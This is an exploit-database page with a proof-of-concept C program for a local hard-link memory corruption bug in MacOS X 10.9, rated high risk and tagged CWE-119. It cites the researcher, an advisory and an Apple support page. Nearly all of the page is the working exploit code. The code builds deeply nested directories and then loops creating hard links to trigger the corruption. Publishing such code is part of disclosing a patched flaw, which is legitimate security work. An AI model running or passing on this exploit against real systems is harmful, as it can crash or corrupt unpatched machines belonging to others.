MacOS X 10.9 Hard Link Memory Corruption PoC

2014.10.19
Risk: High
Local: Yes
Remote: No
CWE: CWE-119

#include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <string.h> #include <sys/param.h> #include <sys/stat.h> #include <sys/types.h> #include <err.h> #include <errno.h> #include <locale.h> /* MacOS X 10.9 Hard Link Memory Corruption PoC Maksymilian Arciemowicz http://cxsecurity.com/ http://cert.cx/ */ int mkpath(char *path, mode_t mode, mode_t dir_mode){ struct stat sb; char *slash; int done,rv; done=0; slash=path; for(;;){ slash += strspn(slash,"/"); slash += strcspn(slash,"/"); done = (*slash=='\0'); *slash = '\0'; rv = mkdir(path, done ? mode : dir_mode); if(rv < 0){ int sverrno; sverrno = errno; if(stat(path,&sb)<0){ errno=sverrno; warn("%s",path); return -1; } if(!S_ISDIR(sb.st_mode)){ errno = ENOTDIR; warn("%s",path); return -1; } } else if (done){ if((chmod(path,mode)== -1)) { warn("%s",path); return -1; } } if(done){ break; } *slash = '/'; } return 0; } int main(int argc, char *argv[]){ if(argc!=2){ printf("Use it with (int)arg[1]\n"); return 1; } int wbita=atoi(argv[1]); char symn1[]="X1\0"; char symn2[]="X2\0"; char symn3[]="X3\0"; char symn4[]="X4\0"; char symn5[]="X5\0"; char symn6[]="X6\0"; char symn7[]="X7\0"; char symn8[]="X8\0"; char buff[]="B\0"; char cd[]="..\0"; char *sym; FILE *fp; int level=0; mode_t mode,dir_mode; sym=malloc(((strlen(buff)*2)+2)*sizeof(char)); mode = ((S_IRWXU | S_IRWXG | S_IRWXO) & ~umask(0)); dir_mode = mode | S_IWUSR |S_IXUSR; mkpath(buff,mode,dir_mode); while(1) // Phase 0 if(0!=chdir(buff)){ printf("Phase 0 done\n"); break; } else printf("Next %i\n",level++); strcpy(sym,buff); strcat(sym,"/"); strcat(sym,buff); for(int ax=level; ax<wbita; ax++){ mkpath(buff,mode,dir_mode); printf("Directory created Level: %i\n",ax); if(0!=chdir(buff)){ printf("Error. chdir() failed."); break; } } mkpath(buff,mode,dir_mode); chdir(buff); mkpath(buff,mode,dir_mode); chdir(cd); //Let's create hardlinks and cd .. loop for(int ax=level; ax<wbita; ax++){ printf("Link1(%s,%s)=%i; cd ..\n",sym,symn1,link(sym,symn1)); printf("Link2(%s,%s)=%i; cd ..\n",sym,symn2,link(sym,symn2)); printf("Link3(%s,%s)=%i; cd ..\n",sym,symn3,link(sym,symn3)); printf("Link4(%s,%s)=%i; cd ..\n",sym,symn4,link(sym,symn4)); printf("Link5(%s,%s)=%i; cd ..\n",sym,symn5,link(sym,symn5)); printf("Link6(%s,%s)=%i; cd ..\n",sym,symn6,link(sym,symn6)); printf("Link7(%s,%s)=%i; cd ..\n",sym,symn7,link(sym,symn7)); printf("Link8(%s,%s)=%i; cd ..\n",sym,symn8,link(sym,symn8)); if(0!=chdir(cd)){ printf("Error. chdir failed!"); break; } } return 0; }

References:

http://cxsecurity.com/issue/WLB-2014040027
http://support.apple.com/kb/HT6535


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top